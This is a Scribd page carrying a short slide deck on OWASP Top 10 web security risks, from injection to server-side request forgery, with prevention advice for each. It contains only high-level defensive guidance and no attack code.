Scribd
Upload
53 views16 pages

A03 - Injection

This document discusses various application security risks and ways to prevent them. It covers topics like injection vulnerabilities, insecure design, security misconfiguration, outdated components, authentication and authorization issues, integrity failures, logging and monitoring problems, and server-side request forgery. The key recommendations are to validate all inputs, use prepared statements, implement secure development practices, keep software updated, log appropriately, and authenticate and authorize users properly.

Uploaded by

Paraku Nageswara Reddy
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PPTX, PDF, TXT or read online on Scribd
53 views16 pages

A03 - Injection

This document discusses various application security risks and ways to prevent them. It covers topics like injection vulnerabilities, insecure design, security misconfiguration, outdated components, authentication and authorization issues, integrity failures, logging and monitoring problems, and server-side request forgery. The key recommendations are to validate all inputs, use prepared statements, implement secure development practices, keep software updated, log appropriately, and authenticate and authorize users properly.

Uploaded by

Paraku Nageswara Reddy
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PPTX, PDF, TXT or read online on Scribd
You are on page 1/ 16

A03 - Injection

•User input is not validated ,filtered or sanitized by the application.


•User input is directly used or concatenated.
- SQL injection
- Command injection.

1
A03 – How to prevent

•Do not pass user input directly to executable statements.


•Prepared statements
- Parameterized Queries.

•Proper patching or updating of database.

2
A04 – Insecure Design

•A secure design still have insecure implementation


•An insecure design cannot be fixed by an implementation.

3
A04 – How to implement

•Secure Development Lifecycle (SDL)


•Threat modeling manifesto.

4
A05 – Security Misconfiguration

• Missing security hardening


•Unnecessary features are enabled or installed
- Unnecessary ports
- Services
- Accounts

•Default accounts
•Default passwords

5
A05 – How to prevent

•Apply security hardening


•Close unnecessary ports
•Disable unnecessary services
•Remove default accounts
•Change default passwords

6
A06 – Vulnerable or Outdated components

•Software is vulnerable , unsupported or outdated


- Apache Log4j(Log4shell) vulnerabilities.

7
A06 – How to prevent

•Update software periodically


•Use software composition Analysis (SCA) tools.

8
A07 – Identification and Authentication failures

•Missing brute force protection


•Missing Multi- factor authentication
•Using default ,weak or well known passwords.
•Reusing session identifier after successful login

9
A07 – How to prevent

•Implement brute force protection


•Implement multi factor authentication
•Change default credentials
•Implement password complexity
•Rotate Session IDs after successful login

10
A08 – Software and Data Integrity failures

•Software and data integrity failures that does not protect against integrity
violations
- Solarwinds 2020 attack

11
A08 – How to prevent

•Use digital signatures to verify passwords


•Ensure you consume trusted repositories

12
A09 – Security Logging and Monitoring Failures

•Insufficient logging
- Logins
- Failed Logins
- High value transactions

•Logs are only stored locally

13
A09 - how to prevent

•Log important events with sufficient user content


- username
- Client IP
- Time

14
A10 – Server Side Request Forgery (SSRF)

•A web application is fetching a remote resource without validating the user


supplied URL

15
A10 – How to prevent

•Sanitize and validate all client supplied input data


•Validate URL components.
- URL schema , port and destination

•Do not send Raw responses to client

16

You might also like